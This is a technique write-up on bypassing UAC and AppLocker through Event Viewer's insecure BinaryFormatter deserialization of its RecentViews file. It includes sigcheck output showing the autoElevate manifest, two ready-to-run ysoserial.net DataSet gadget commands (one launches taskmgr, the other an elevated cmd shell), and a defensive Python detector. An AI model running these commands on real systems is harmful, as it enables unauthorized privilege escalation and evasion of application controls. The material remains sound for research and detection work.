
Insecure .Net Deserialization

We will be focusing on the .NET deserialization vulnerability in Event Viewer to bypass User Account Control (elevating ourselves to a higher-integrity user) and AppLocker.

Originally discovered by @orange_8361. When we open Event Viewer and watch it in Process Monitor, we can see that it tries to query and open a file called RecentViews.

The file is located at C:\Users\<username>\AppData\Local\Microsoft\Event Viewer\RecentViews.

Note: If the file is not present, simply browse through Event Viewer and view some logs; this creates the RecentViews file.

Let's take a look at the file.

We can see some unprintable (binary) characters and some ASCII text referring to .NET classes like System.Collections.ArrayList. Most likely, this is a .NET object graph that has been serialized with BinaryFormatter.

However, Microsoft's own documentation says that BinaryFormatter is insecure and should not be used.

The fact that Windows Event Viewer deserializes this file with BinaryFormatter to populate the recent-views user interface is an insecure deserialization vulnerability.
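As an added example (not part of the original write-up), a small Python check a defender can run over a RecentViews file: it verifies the BinaryFormatter SerializationHeaderRecord, lists the .NET type names visible in the stream, and flags the DataSet type used by the gadget in this write-up, which a normal recent-views list is assumed not to contain. The type lists and the sample bytes are constructed assumptions, not Event Viewer's actual format beyond the header.

```python
import re
import struct
from pathlib import Path

# Assumptions (not from Event Viewer's code): the write-up only observed
# System.Collections.ArrayList in a normal file, and its payload used the
# DataSet gadget, so that type name is treated as a tamper indicator.
EXPECTED_TYPE = "System.Collections.ArrayList"
GADGET_TYPES = {"System.Data.DataSet"}


def is_binaryformatter_stream(data: bytes) -> bool:
    """True if data starts with a SerializationHeaderRecord: record type 0x00,
    then RootId, HeaderId, MajorVersion=1, MinorVersion=0 as little-endian int32."""
    if len(data) < 17 or data[0] != 0x00:
        return False
    _root_id, _header_id, major, minor = struct.unpack_from("<iiii", data, 1)
    return major == 1 and minor == 0


def extract_type_names(data: bytes) -> list[str]:
    """Pull dotted .NET-looking identifiers out of the stream's length-prefixed
    strings (a crude byte scan, not a full record parser)."""
    found = re.findall(rb"[A-Za-z_][A-Za-z0-9_]*(?:\.[A-Za-z_][A-Za-z0-9_]*)+", data)
    return sorted({name.decode("ascii") for name in found})


def assess(data: bytes) -> dict:
    """Return a verdict plus the evidence a responder would want to log."""
    is_bf = is_binaryformatter_stream(data)
    types = extract_type_names(data) if is_bf else []
    hits = [t for t in types if t in GADGET_TYPES]
    return {"binaryformatter": is_bf, "types": types,
            "gadget_types": hits, "suspicious": bool(hits)}


def scan_recentviews(path: str) -> dict:
    """Assess an on-disk RecentViews file (path supplied by the caller)."""
    return assess(Path(path).read_bytes())


# Constructed samples: a valid header followed by length-prefixed type-name
# strings only, not complete BinaryFormatter records.
HEADER = b"\x00" + struct.pack("<iiii", 1, -1, 1, 0)
BENIGN = HEADER + b"\x1cSystem.Collections.ArrayList"
TAMPERED = HEADER + b"\x13System.Data.DataSet"

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("tampered", TAMPERED)):
        print(label, assess(sample))
```

A real deployment would pair this with file-write auditing on the RecentViews path, since the check only sees the file after it has been replaced.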

Another interesting thing to note is the manifest of Event Viewer itself.

Using a tool like sigcheck.exe, we can see that the manifest of eventvwr.exe requests auto-elevation.

C:\Users\wirel\OneDrive\Documents\SigCheck>sigcheck64.exe -m C:\Windows\System32\eventvwr.exe

Sigcheck v2.82 - File version and signature viewer
Copyright (C) 2004-2021 Mark Russinovich
Sysinternals - www.sysinternals.com

c:\windows\system32\eventvwr.exe:
        Verified:       Signed
        Signing date:   3:09 pm 29/4/2022
        Publisher:      Microsoft Windows
        Company:        Microsoft Corporation
        Description:    Event Viewer Snapin Launcher
        Product:        Microsoft® Windows® Operating System
        Prod version:   10.0.22000.653
        File version:   10.0.22000.653 (WinBuild.160101.0800)
        MachineType:    64-bit
        Manifest:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!-- Copyright (c) Microsoft Corporation -->
<assembly xmlns="urn:schemas-microsoft-com:asm.v1"  xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" manifestVersion="1.0">
<assemblyIdentity
    version="5.1.0.0"
    processorArchitecture="amd64"
    name="Microsoft.Windows.Eventlog.EventVwr"
    type="win32"
/>
<description>Event Viewer Snapin Launcher</description>

<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
        <requestedPrivileges>
            <requestedExecutionLevel
                level="highestAvailable"
                uiAccess="false"
            />
        </requestedPrivileges>
    </security>
</trustInfo>
<asmv3:application>
   <asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
        <autoElevate>true</autoElevate>
   </asmv3:windowsSettings>
</asmv3:application>
</assembly>

We can see the XML element <autoElevate>true</autoElevate>, which allows Event Viewer to bypass UAC.

We could thus create a deserialization gadget to execute arbitrary files, bypassing UAC and AppLocker.

We can use ysoserial.net to create our deserialization gadget.

I have set my UAC setting to the highest level.

If I open taskmgr, we can see UAC interfering with us.

Now let's use ysoserial.net to create our deserialization gadget.

ysoserial.exe -o raw -g DataSet -f BinaryFormatter -c taskmgr > 
"C:\Users\wirel\AppData\Local\Microsoft\Event Viewer\RecentViews"

Now when we open Event Viewer, it succumbs to the insecure deserialization and opens our Task Manager, bypassing UAC. This technique can also be used to bypass AppLocker.

If this were an Admin account, attackers could easily spawn an elevated Administrator shell.

ysoserial.exe --output=raw --gadget=DataSet --formatter=BinaryFormatter 
--command=powershell "start cmd -v runAs" --rawcmd > 
"C:\Users\wirel\AppData\Local\Microsoft\Event Viewer\RecentViews"

We have just spawned an elevated command shell from a non-elevated Administrator context, bypassing UAC and AppLocker.

Credits

Original discoverer: Orange Tsai